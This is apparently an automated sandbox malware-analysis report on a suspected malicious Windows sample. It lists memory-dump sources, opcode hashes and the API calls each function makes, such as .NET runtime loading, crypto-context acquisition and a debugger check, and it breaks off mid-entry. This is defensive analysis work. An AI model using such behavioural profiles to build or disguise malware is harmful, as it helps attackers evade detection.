                                            • Opcode ID: 523fabb44b02fcaa1064eae8d9a10a48e2cd5a800d24befd30ec8c8c27650fb1
                                            • Instruction ID: acb334029d7d2359caf37fb7fcb3e49a3223770537b7a8891ae1dcab9495986d
                                            • Opcode Fuzzy Hash: 523fabb44b02fcaa1064eae8d9a10a48e2cd5a800d24befd30ec8c8c27650fb1
                                            • Instruction Fuzzy Hash: 8D11D076508280CFCB12CF10D9C4B16BF72FF94314F28C6A9D8490B656C33AD81ACBA2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1986678619.0000000000D7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_d7d000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8f2dc214fb3b67dee6d63525546fcd79b48668cd63b1e3b0b14567c0ac11da0e
                                            • Instruction ID: c8d134bcd598817bc466957384508b89d2028eae0dc34c72b3d48705244846df
                                            • Opcode Fuzzy Hash: 8f2dc214fb3b67dee6d63525546fcd79b48668cd63b1e3b0b14567c0ac11da0e
                                            • Instruction Fuzzy Hash: 0E119076504280CFDB12CF14D5C4B16BF72FB94314F28C6A9D9494B656C33AD81ACBA2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1986678619.0000000000D7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_d7d000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7b4c623aaf12d799d01dfa0934b93cccf601b23327cf73bb2393620fe977b88f
                                            • Instruction ID: cbb80950ec7c3366c2cd688547d9ca7b84c431608f603c475f03d07ea42e0579
                                            • Opcode Fuzzy Hash: 7b4c623aaf12d799d01dfa0934b93cccf601b23327cf73bb2393620fe977b88f
                                            • Instruction Fuzzy Hash: 8711C176504280DFDB11CF14D5C4B19BF72FB94328F28C6A9D84D4B656D33AE84ACBA2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2013627537.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ee0000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d4a5b6954e2df8efd030a706b26df0a3864b768a77bd1be21a1f9dfd683a7bbf
                                            • Instruction ID: f4974827e3d33b36fb1da994a2fbcbdd782cbe82ca8007efaf53c0b41e76d130
                                            • Opcode Fuzzy Hash: d4a5b6954e2df8efd030a706b26df0a3864b768a77bd1be21a1f9dfd683a7bbf
                                            • Instruction Fuzzy Hash: 15014C353001149F8748EF6DE898C2E7BEAFF8961075144A9E50ACB3B2DF71EC018B64
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1987300613.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2a80000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0ac77be231828ba21783c71cf38d5020d05a3f2ec246f7224a99c852d50945a7
                                            • Instruction ID: 31d6785bd70b8181be2cc82343e976d81b6554ab964261476cbcf47439c47c50
                                            • Opcode Fuzzy Hash: 0ac77be231828ba21783c71cf38d5020d05a3f2ec246f7224a99c852d50945a7
                                            • Instruction Fuzzy Hash: 8011F5B8D04209CFCB04EFA9D9595AEBBF5BB88300F508465D919A3351DF385901CFA1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1987300613.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2a80000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d90b90785da646dc1ce52ad2eba92773261e98f7ffca82ef17247d07f69a0c3a
                                            • Instruction ID: e0763cafb7358cc6144ee68275f88536bd1e09a4bbdce3db70d72a70e8fac99a
                                            • Opcode Fuzzy Hash: d90b90785da646dc1ce52ad2eba92773261e98f7ffca82ef17247d07f69a0c3a
                                            • Instruction Fuzzy Hash: 62014C70C496499ECB40FFB988492AEBFF4BF4A208F0485AAC529D3212EB744659CF51
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1986597710.0000000000D6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D6D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_d6d000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 608c35a2111c4801ea16750143f6e6725b294c8dcd4710a24b7b3c48eb55d415
                                            • Instruction ID: d51a79b1a9de8c69aec404105c6eeadb5f6d6ef6782984e3cefeea212a60ecbb
                                            • Opcode Fuzzy Hash: 608c35a2111c4801ea16750143f6e6725b294c8dcd4710a24b7b3c48eb55d415
                                            • Instruction Fuzzy Hash: B9012B71A043409BE7208B19DD84B67BF9DEF57320F1CC52AED490A286C2BDD840CA71
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1987300613.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2a80000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7959af5dc9509dfca67f8c8c13ff997183baa9d4e81ed01b21cf34b42d676424
                                            • Instruction ID: 3122a8121878bc84010dd4c4c5f6f8006d64b285d70f4f799263dcd050216fad
                                            • Opcode Fuzzy Hash: 7959af5dc9509dfca67f8c8c13ff997183baa9d4e81ed01b21cf34b42d676424
                                            • Instruction Fuzzy Hash: AA01F670D45609DECB40FFB988492AEBAF9BB49208F0089A9952DE3211FF744658CB91
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1986597710.0000000000D6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D6D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_d6d000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0b34cb133bdf4833f38e82214b7cfd17d3eabf66ac1eb1bb24971db6d24bb850
                                            • Instruction ID: 0e57a47752e7b704675befd6e761d43a7f5572b06aeb0527c0b81c51a1a3a71a
                                            • Opcode Fuzzy Hash: 0b34cb133bdf4833f38e82214b7cfd17d3eabf66ac1eb1bb24971db6d24bb850
                                            • Instruction Fuzzy Hash: 2DF0C2715043449BE7208A0ADC84B62FFA8EF52334F1CC45AED085A286C2799840CAB1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1987300613.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2a80000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ace94969f1726813272863b0580f88e359809cc2898d87ce2460be2222252483
                                            • Instruction ID: 5e02029ed7338dc53b5580f7914dd5756a869600a8f20f9f437de8d700409ec6
                                            • Opcode Fuzzy Hash: ace94969f1726813272863b0580f88e359809cc2898d87ce2460be2222252483
                                            • Instruction Fuzzy Hash: DFD05B30C4D20CDFC704EF64D5445BCBBB8AB07315F805294D80E23362DF345955D699
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1987300613.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2a80000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fbc0c8af85de28c2ad7dd68f45ebf85988ccf5d48e85f9de95a6387493ab5f28
                                            • Instruction ID: 1f76a28d41bc61e4bf19963348e9835772e9005db07f4cf00ef20969bae025dd
                                            • Opcode Fuzzy Hash: fbc0c8af85de28c2ad7dd68f45ebf85988ccf5d48e85f9de95a6387493ab5f28
                                            • Instruction Fuzzy Hash: D8E01774D1521CEFCB45EFB8E84969CBFF4AB04302F6041A9E808E3351EB305A90CB91
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1987300613.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2a80000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d8912d3852418a4590de3e2e63b93a1ea2a90fe6701c95c939e55699b402c5af
                                            • Instruction ID: 0d27afbaecd6e918e5de5d23c0c818e8161adce01274a566671baaea127b2923
                                            • Opcode Fuzzy Hash: d8912d3852418a4590de3e2e63b93a1ea2a90fe6701c95c939e55699b402c5af
                                            • Instruction Fuzzy Hash: D8E0E274921208EFCB41EFA8E84969DBBB4AB04206F5041AA9808E3350EB309A94CB91
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1987300613.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2a80000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cc86672bcecb10f03f1cba877c121aeeee608ac3847c0070584d546176d6e334
                                            • Instruction ID: 3ab6c6bc3b49437273c7404cd5397531f5f387c6578050bb5d58d97872be22ca
                                            • Opcode Fuzzy Hash: cc86672bcecb10f03f1cba877c121aeeee608ac3847c0070584d546176d6e334
                                            • Instruction Fuzzy Hash: EED05E30802308EFC705FFA4E540A9DBFB5EF41305FA041A9D808A3750DB315E90DB95
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2013627537.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ee0000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 15892f831a9b334967672299925ab3c3509cdd0d8a10cbbf92d0ea297f6fc245
                                            • Instruction ID: bd51d3146e445a5bb9402b0a33a063c697d543613175fc44cc7f76c2f67c65ec
                                            • Opcode Fuzzy Hash: 15892f831a9b334967672299925ab3c3509cdd0d8a10cbbf92d0ea297f6fc245
                                            • Instruction Fuzzy Hash: B0E0EC7095020ADFEB19DF65D4566AD7FF1EF84314F204529E002DA560DF794581CF91
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1987300613.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2a80000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2436783505e4b256afe7ffcfca2aaca9d5c9ca905139bfb0c829dffc5b1db314
                                            • Instruction ID: 8fa6433902b196b054a364e271cd8f530678d96f39d1fef5933e9fbfab661aa8
                                            • Opcode Fuzzy Hash: 2436783505e4b256afe7ffcfca2aaca9d5c9ca905139bfb0c829dffc5b1db314
                                            • Instruction Fuzzy Hash: C7D0A7310042804FD7176F7878A83D03F604F2B311B0806D5E48CC7166D7154052D370
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1987300613.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2a80000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: aa95deee4b755ea187a400b1aa29d804565eac7c585f782a062bd10587ec928f
                                            • Instruction ID: 1fe336971d36e1c594c3a61dc2e59db97ee96c50bf6ea288f90d00c02e8b9c3c
                                            • Opcode Fuzzy Hash: aa95deee4b755ea187a400b1aa29d804565eac7c585f782a062bd10587ec928f
                                            • Instruction Fuzzy Hash: 78D0A721005395CDD7125764B8183747EA4670231AF480152D44CC5FA3EBA500D0C272
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2013627537.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ee0000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f4abbf75f5a42890a97e339f94ffb00aac0d01fb01931219306bea7a9d99e250
                                            • Instruction ID: 567e36d63d019da8db22543ac9787999e3027085433934976229dd2ab295c911
                                            • Opcode Fuzzy Hash: f4abbf75f5a42890a97e339f94ffb00aac0d01fb01931219306bea7a9d99e250
                                            • Instruction Fuzzy Hash: 12D067B095430ADEEB148F51D0567AEBFB1AF44314F204519E101AA540CB7A4185CBC0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1987300613.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2a80000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 68be1517b3acdcdec798d4d19dac7c322b7d5a00d2704f083bbc27fad3559a17
                                            • Instruction ID: 12fd9007fcca15c2f2ee21724329960a18b1d61017233acbc6bb8ef922b3d7cd
                                            • Opcode Fuzzy Hash: 68be1517b3acdcdec798d4d19dac7c322b7d5a00d2704f083bbc27fad3559a17
                                            • Instruction Fuzzy Hash: EBB09231042708CADB166BA8B908764B6A86B0132BF880514A54C81662AFA190E4D6BA
                                            APIs
                                            • VariantInit.OLEAUT32(?), ref: 6CEB2DFF
                                            • VariantInit.OLEAUT32(?), ref: 6CEB2E08
                                            • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CEB2E7E
                                            • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CEB2EB5
                                            • VariantClear.OLEAUT32(?), ref: 6CEB2EC1
                                              • Part of subcall function 6CEBC850: VariantInit.OLEAUT32(?), ref: 6CEBC88F
                                              • Part of subcall function 6CEBC850: VariantInit.OLEAUT32(?), ref: 6CEBC895
                                              • Part of subcall function 6CEBC850: SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CEBC8A0
                                              • Part of subcall function 6CEBC850: SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CEBC8D5
                                              • Part of subcall function 6CEBC850: VariantClear.OLEAUT32(?), ref: 6CEBC8E1
                                            • VariantClear.OLEAUT32(?), ref: 6CEB30D5
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB3550
                                            • VariantClear.OLEAUT32(?), ref: 6CEB3563
                                            • VariantClear.OLEAUT32(?), ref: 6CEB3569
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Variant$ArrayClearSafe$Init$CreateElementVector$Destroy
                                            • String ID:
                                            • API String ID: 2012514194-0
                                            • Opcode ID: 7ec5c6c285ded46acfd3e3de168d76183b75a4b3b88b6257c9ceb7d47ca0fc51
                                            • Instruction ID: 73c154cf882534ebcd19e791a6185421988e45d32765a97ad98ca5a3d2208ce6
                                            • Opcode Fuzzy Hash: 7ec5c6c285ded46acfd3e3de168d76183b75a4b3b88b6257c9ceb7d47ca0fc51
                                            • Instruction Fuzzy Hash: E8526C71D012189FCB05DFA8C980BEEBBB5BF89308F258199E509BB751DB70A945CF90
                                            APIs
                                            • CorBindToRuntimeEx.MSCOREE(v2.0.50727,wks,00000000,6CF20634,6CF20738,?), ref: 6CEAA119
                                            • GetModuleHandleW.KERNEL32(mscorwks), ref: 6CEAA145
                                            • __cftoe.LIBCMT ref: 6CEAA1FB
                                            • GetModuleHandleW.KERNEL32(?), ref: 6CEAA215
                                            • GetProcAddress.KERNEL32(00000000,00000018), ref: 6CEAA265
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: HandleModule$AddressBindProcRuntime__cftoe
                                            • String ID: mscorwks$v2.0.50727$wks
                                            • API String ID: 1312202379-2066655427
                                            • Opcode ID: 3b71c01bfa38552a9fdd1f32c1789b2f244c13999633114bd7e2911002764b37
                                            • Instruction ID: 13eed2a48cd6dd311c756aee7d230a9936ff24d2bbd8aaee2f180665ebe23d51
                                            • Opcode Fuzzy Hash: 3b71c01bfa38552a9fdd1f32c1789b2f244c13999633114bd7e2911002764b37
                                            • Instruction Fuzzy Hash: 619169B1E052499FCB04DFE8C880A9EBBB5FF49314F20866DE159EB740D7359906CB94
                                            APIs
                                            • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,67D4BDE6,6CF18180,00000000,?), ref: 6CEEDBFB
                                            • GetLastError.KERNEL32 ref: 6CEEDC01
                                            • CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000008), ref: 6CEEDC15
                                            • CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000028), ref: 6CEEDC26
                                            • SetLastError.KERNEL32(00000000), ref: 6CEEDC2D
                                              • Part of subcall function 6CEED9D0: GetLastError.KERNEL32(00000010,67D4BDE6,7508FC30,?,00000000), ref: 6CEEDA1A
                                            • __CxxThrowException@8.LIBCMT ref: 6CEEDC78
                                              • Part of subcall function 6CEFAC75: RaiseException.KERNEL32(?,?,6CEF9C34,67D4BDE6,?,?,?,?,6CEF9C34,67D4BDE6,6CF29C90,6CF3B974,67D4BDE6), ref: 6CEFACB7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: AcquireContextCryptErrorLast$ExceptionException@8RaiseThrow
                                            • String ID: CryptAcquireContext$Crypto++ RNG
                                            • API String ID: 3279666080-1159690233
                                            • Opcode ID: 39e45279941e8351587ba849aeb7e7f4060b0298daaef6061419886e8bfa9c1f
                                            • Instruction ID: d09885867aec086a941cec2d56eea8d9b43a9636c01df78eaea215f4995150d9
                                            • Opcode Fuzzy Hash: 39e45279941e8351587ba849aeb7e7f4060b0298daaef6061419886e8bfa9c1f
                                            • Instruction Fuzzy Hash: F7210BB225C300AFD310DB25CC45F977BF8EB89798F11091EF54196AC0DBB6E5088791
                                            APIs
                                            • IsDebuggerPresent.KERNEL32 ref: 6CEFCE6C
                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6CEFCE81
                                            • UnhandledExceptionFilter.KERNEL32(6CF19428), ref: 6CEFCE8C
                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 6CEFCEA8
                                            • TerminateProcess.KERNEL32(00000000), ref: 6CEFCEAF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                            • String ID:
                                            • API String ID: 2579439406-0
                                            • Opcode ID: 82e33c5cd0c7781d6efd3907c225ab12ab868b3cdb5b7fe17121586ff5ca21a5
                                            • Instruction ID: 619e14b6115c6eb0f83c651ef37447ae80d5ff0ab1fe87516ba6f835f07e5586
                                            • Opcode Fuzzy Hash: 82e33c5cd0c7781d6efd3907c225ab12ab868b3cdb5b7fe17121586ff5ca21a5
                                            • Instruction Fuzzy Hash: 3121EFB4E25A04EFCFB8DF19D0697443BB6FB4A308F20485AEC0D87B40E7B049818B95
                                            APIs
                                            • __CxxThrowException@8.LIBCMT ref: 6CEF24A1
                                              • Part of subcall function 6CEFAC75: RaiseException.KERNEL32(?,?,6CEF9C34,67D4BDE6,?,?,?,?,6CEF9C34,67D4BDE6,6CF29C90,6CF3B974,67D4BDE6), ref: 6CEFACB7
                                            • std::exception::exception.LIBCMT ref: 6CEF248C
                                              • Part of subcall function 6CEF9533: std::exception::_Copy_str.LIBCMT ref: 6CEF954E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
                                            • String ID:
                                            • API String ID: 757275642-0
                                            • Opcode ID: bcbf2940a1ba905d073ec12232a87fe7ae24c8bad15b939dcf0b19fd912ea5a1
                                            • Instruction ID: e07ef759d3fa5fce949a642b4de929f6f70fc1fb5afcbcde9d6e32c02acfe331
                                            • Opcode Fuzzy Hash: bcbf2940a1ba905d073ec12232a87fe7ae24c8bad15b939dcf0b19fd912ea5a1
                                            • Instruction Fuzzy Hash: 17329671A0164A8FDB04CFA8C494A9EB7B5FF99708F34411CE4269BB50E731ED06CBA1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a03333504f3f2bf9ad53faf0204689954fa596c3c9df66b96ef08ea6e61a7440
                                            • Instruction ID: 42e8842d8a89ef704099c83652ac72ab1115732f68d9873135008059f210feac
                                            • Opcode Fuzzy Hash: a03333504f3f2bf9ad53faf0204689954fa596c3c9df66b96ef08ea6e61a7440
                                            • Instruction Fuzzy Hash: 9D02A2B0A287549FC794CF29C4B063EBBF2EBCA311F41090EE5F95B251C238A559CB65
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
